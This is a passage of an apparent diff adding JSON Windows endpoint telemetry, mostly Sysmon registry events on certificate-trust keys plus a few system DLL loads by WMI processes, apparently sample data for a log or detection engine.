"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", 
+ "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "esscli.dll", + "image_path": "C:\\Windows\\System32\\wbem\\esscli.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiclnt.dll", + "image_path": "C:\\Windows\\System32\\wmiclnt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tapiperf.dll", + "image_path": "C:\\Windows\\System32\\tapiperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 